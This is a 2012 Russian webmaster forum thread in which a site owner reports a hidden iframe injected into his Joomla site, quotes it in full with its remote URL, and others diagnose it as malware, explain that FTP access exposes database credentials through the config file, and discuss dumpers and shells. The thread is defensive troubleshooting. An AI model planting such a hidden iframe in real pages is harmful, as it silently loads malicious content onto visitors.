X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Неизвестный код на сайте
dynz
dynz
Topic Starter сообщение 12.3.2012, 15:34; Ответить: dynz
Сообщение #1


Здравствуйте. Я дал заказ фрилансеру чтобы он исправил там некоторые баги в верстке и кое-что доверстал. Буквально сейчас на сайте обнаружил вот такой вот подозрительный код:
<iframe name="SagUTeXYne" src="http://freedom24.ru/templates/rhuk_milkyway/kx/index.php?out=1330961285" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>

Вопрос: что это за код? Вредоносный ли он? URL сайта: http://msosh.ru


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
allsab
allsab
сообщение 12.3.2012, 15:42; Ответить: allsab
Сообщение #2


Очень похоже на вирус.

Да и на сайт http://freedom24.ru/templates/rhuk_milkywa...?out=1330961285 антивирус не пускает, тревога...
Думаю ничего хорошего от этого ожидать не стоит.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dynz
dynz
Topic Starter сообщение 12.3.2012, 15:54; Ответить: dynz
Сообщение #3


Уже удалил код, сменил FTP

Больше антивирусы не орут? Скажите можно имея доступ к FTP и доступ к админке joomla слить БД?

обнаружил на сайте mysqldumer. Удаляю. Он что БД слил получается?!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
allsab
allsab
сообщение 12.3.2012, 16:06; Ответить: allsab
Сообщение #4


Сейчас нормально.
Можно с ftp узнать данные для доступа к базе данных через config, а дальше и слить уже.
По joomla точно не знаю, в dle в админ. панели есть функция резервного копирования базы данных.
Но зачем mysqldumer непонятно, если можно сразу же на компьютер закачать


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 12.3.2012, 17:04; Ответить: Electric
Сообщение #5


(dynz @ 12.3.2012, 14:54) *
Он что БД слил получается?!
Скорее всего. Но может не успел.
Имея доступ к ФТП - можно получить доступ к БД.
Проверьте на наличие других гадостей на сайте (именно по ФТП), вот тут рекомендации по удлению возможніх вирусов и шеллов: http://www.maultalk.com/topic116023.html


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 12.3.2012, 17:22; Ответить: Rxp
Сообщение #6


Возможно у вас шелл залит, если повториться данная проблема стучите помогу удалить и вирусы и шеллы!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Kuznec37
Kuznec37
сообщение 12.3.2012, 17:32; Ответить: Kuznec37
Сообщение #7


(dynz @ 12.3.2012, 12:54) *
обнаружил на сайте mysqldumer. Удаляю. Он что БД слил получается?!

Дампером намного быстрее сделать резервное копирование, на все про все, как правило, достаточно пары минут. Так что скорее всего вы уже опоздали.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreenMan
GreenMan
сообщение 12.3.2012, 17:58; Ответить: GreenMan
Сообщение #8


Да, фрилансер молодец, конечно...


--------------------
- вэбмастер-энтузиаст -
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dynz
dynz
Topic Starter сообщение 12.3.2012, 18:00; Ответить: dynz
Сообщение #9


Фуф) слава тебе господи. Это не фрилансер вроде. Сайт да слит, но вроде для того чтобы сделать то что он должен на локалхосте. Это уже я тупанул. Ну то что кто-то изменил файл index.php и добавил туда вредоносный код остается фактом. Постараюсь узнать по логам. Тогда будет более понятно smile.gif
Rxp хорошо обязательно постучу.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
52 Baksman 33589 18.4.2024, 5:02
автор: Baksman
Открытая тема (нет новых ответов) Боты могут делать пушподписки на моём сайте?
0 Megaspryt 477 17.4.2024, 23:29
автор: Megaspryt
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
36 CryptoCLoud 10639 16.4.2024, 16:02
автор: CryptoCLoud
Горячая тема (нет новых ответов) Странный трафик на сайте длительное время
33 TABAK 8790 12.4.2024, 5:56
автор: Skyworker
Открытая тема (нет новых ответов) Алтуально ли заработок на сайте?
Оцение пожалуйста идею
10 hitman20 1882 1.2.2024, 5:37
автор: Liudmila


 



RSS Текстовая версия Сейчас: 20.4.2024, 4:59
Дизайн